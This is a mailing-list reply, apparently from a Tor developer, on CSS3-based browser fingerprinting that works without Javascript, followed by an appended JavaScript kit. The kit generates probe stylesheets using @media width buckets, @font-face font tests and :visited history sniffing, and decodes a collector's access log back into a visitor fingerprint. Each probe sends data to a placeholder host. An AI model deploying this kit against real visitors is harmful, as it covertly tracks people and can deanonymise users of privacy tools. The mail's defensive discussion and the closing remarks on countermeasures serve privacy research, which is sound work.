Thus spake Just A. User (just_a_user@xxxxxxxxxxxxx):

> http://what-is-my-ip-address.anonymous-proxy-servers.net
> are able to discover the browser's window inner dimensions
> accurately.
>
> The font downloading attack (@font-face based) from that test is
> also successful.

The short answer here is that new CSS3-based fingerprinting attacks are currently not possible to fully defend against through extension-land, and that while we do take them seriously, we don't have a lot of options to truly protect against them in the short term.

JonDoNym is performing a bit of sleight of hand on its users wrt these attacks. It only "protects" against these attacks by requiring that Javascript be disabled, but this is not a full defense. The CSS3 "Media Queries" allow you to select entire stylesheets to be loaded on the basis of screen resolution and display information:

https://developer.mozilla.org/En/CSS/Media_queries

Thus, media queries are quite capable of inducing element loads based on screen resolution and font information, which can be used to ping a server with information about your resolution without the need for Javascript. The mechanisms for this are similar to the CSS-only history attack that does not require Javascript and works on Firefox 2.x and 3.x:

http://ha.ckers.org/weird/CSS-history-hack.html

The JonDoNym test is only using the Javascript versions of these attacks, and therefore the JonDoFox profile they provide is given a green "pass" against them, even though a dedicated adversary could extract the same information with CSS3 alone. When I run Torbutton with Javascript disabled, I get very similar results to the JonDoFox profile on their test (are you sure you had Javascript fully disabled?)

But again, the reality is this is not the whole story. We are currently actively trying to get people at the W3C and inside Google and Mozilla to address these issues, because short of us patching the browsers directly, there is not much we can do here.

We may end up patching our Tor Browser Bundle builds if it doesn't appear that any of these groups are taking these new fingerprinting vectors seriously. This places us in an interesting legal situation with Mozilla, because technically such a patch means that we can no longer use the trademark "Firefox" to describe the browser we provide in this case.

Our goal for the W3C is to get them to define a common subset of rendering behaviors that all browsers can adhere to while in "private browsing mode". I believe the timeline for adoption of this standard would be measured in multiple years, though.

Our goal with the browsers is to convince them to provide us with some kind of API to interact with CSS and the rendering system. For Chrome, their release cycle is faster and this process would be measured in months (if we had all the other APIs we needed, see https://blog.torproject.org/blog/google-chrome-incognito-mode-tor-and-fingerprinting). But for Firefox, their release cycle is slower, and this time period is probably still measured in years.

So to sum it up, lots of rocks, and lots of hard places :/

-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs
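The no-Javascript leak described in the message above, as an added example that is not part of the original mail and is not Tor, Torbutton or JonDoNym code: a generator for a probe stylesheet that uses @media width buckets, @font-face local()/url() fallbacks and :visited selectors to make the browser fetch distinct URLs, together with the server-side decoder that turns an access log of those fetches back into a fingerprint. The collector host PROBE_HOST, the query-parameter names, the bucket sizes, the probed fonts and sites, and the sample log lines are all constructed for this illustration.

```javascript
// Added example (not from the mail above, nor Tor/JonDoNym code): CSS-only
// fingerprinting probes and the decoder for the hits they produce.
// PROBE_HOST, the parameter names, the probe lists and SAMPLE_LOG are made up.
const PROBE_HOST = "https://probe.example.invalid";

// Viewport-width buckets in px; one @media rule per bucket. Narrower buckets
// (down to 1px) give the exact width at the cost of a longer stylesheet.
const WIDTH_BUCKETS = [
  [0, 799], [800, 1023], [1024, 1279], [1280, 1599], [1600, 1919], [1920, 9999],
];
// Fonts tested with @font-face: the url() fallback is fetched only when the
// local() font is absent, so a hit on /f means "font not installed".
const FONT_PROBES = ["Helvetica Neue", "Calibri", "DejaVu Sans", "Ubuntu"];
// Sites tested with the :visited trick (worked on Firefox 2.x/3.x per the mail).
const HISTORY_PROBES = ["https://www.torproject.org/", "https://anonymous-proxy-servers.net/"];

function buildProbeStylesheet() {
  const rules = [];
  WIDTH_BUCKETS.forEach(([lo, hi]) => {
    rules.push(
      `@media screen and (min-width: ${lo}px) and (max-width: ${hi}px) ` +
      `{ #probe { background-image: url("${PROBE_HOST}/w?b=${lo}-${hi}"); } }`);
  });
  FONT_PROBES.forEach((font, i) => {
    const name = encodeURIComponent(font);
    rules.push(
      `@font-face { font-family: "probe-font-${i}"; ` +
      `src: local("${font}"), url("${PROBE_HOST}/f?name=${name}"); }`);
    // The page needs <span class="probe-font-i">x</span> so the family is resolved.
    rules.push(`.probe-font-${i} { font-family: "probe-font-${i}"; }`);
  });
  HISTORY_PROBES.forEach((site, i) => {
    // The page needs <a id="probe-hist-i" href="...site...">..</a> for each entry.
    rules.push(`#probe-hist-${i}:visited { background-image: url("${PROBE_HOST}/v?i=${i}"); }`);
  });
  return rules.join("\n");
}

// Decode one request path into the fact it reveals, or null for non-probe URLs.
function decodeProbeHit(requestPath) {
  const url = new URL(requestPath, PROBE_HOST);
  if (url.pathname === "/w") {
    const m = /^(\d+)-(\d+)$/.exec(url.searchParams.get("b") || "");
    return m ? { kind: "width", min: Number(m[1]), max: Number(m[2]) } : null;
  }
  if (url.pathname === "/f") {
    const name = url.searchParams.get("name"); // searchParams percent-decodes
    return name && FONT_PROBES.includes(name) ? { kind: "font-missing", font: name } : null;
  }
  if (url.pathname === "/v") {
    const raw = url.searchParams.get("i");
    const i = raw === null ? -1 : Number(raw);
    return HISTORY_PROBES[i] ? { kind: "visited", site: HISTORY_PROBES[i] } : null;
  }
  return null;
}

// Fold an access log into a fingerprint. Fonts probed but never fetched are
// installed locally; only hits, never the absence of hits, are logged for /v.
function fingerprintFromLog(logLines) {
  const fp = { widthRange: null, missingFonts: [], visited: [] };
  for (const line of logLines) {
    const m = /"GET (\S+) HTTP/.exec(line);
    if (!m) continue;
    const hit = decodeProbeHit(m[1]);
    if (!hit) continue;
    if (hit.kind === "width") fp.widthRange = { min: hit.min, max: hit.max };
    else if (hit.kind === "font-missing") fp.missingFonts.push(hit.font);
    else if (hit.kind === "visited") fp.visited.push(hit.site);
  }
  fp.presentFonts = FONT_PROBES.filter((f) => !fp.missingFonts.includes(f));
  return fp;
}

// Constructed access log of one visitor with Javascript disabled loading the probes.
const SAMPLE_LOG = [
  '10.0.0.7 - - [12/Jan/2011:10:00:01 +0000] "GET /probe.css HTTP/1.1" 200 1209',
  '10.0.0.7 - - [12/Jan/2011:10:00:01 +0000] "GET /w?b=1280-1599 HTTP/1.1" 200 43',
  '10.0.0.7 - - [12/Jan/2011:10:00:01 +0000] "GET /f?name=Calibri HTTP/1.1" 200 0',
  '10.0.0.7 - - [12/Jan/2011:10:00:02 +0000] "GET /f?name=Helvetica%20Neue HTTP/1.1" 200 0',
  '10.0.0.7 - - [12/Jan/2011:10:00:02 +0000] "GET /v?i=0 HTTP/1.1" 200 43',
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(buildProbeStylesheet());
  console.log(JSON.stringify(fingerprintFromLog(SAMPLE_LOG), null, 2));
}
```

Nothing in the stylesheet runs script, so disabling Javascript does not stop any of the three probes; what a browser profile would have to do is refuse to fetch conditional subresources, spoof the media features, or answer every local() probe the same way. The :visited part only illustrates the mechanism the mail points to: browsers released after the Firefox 3.x era restrict what :visited may style, so that probe no longer fires there, while the @media and @font-face probes depend only on standard CSS behaviour.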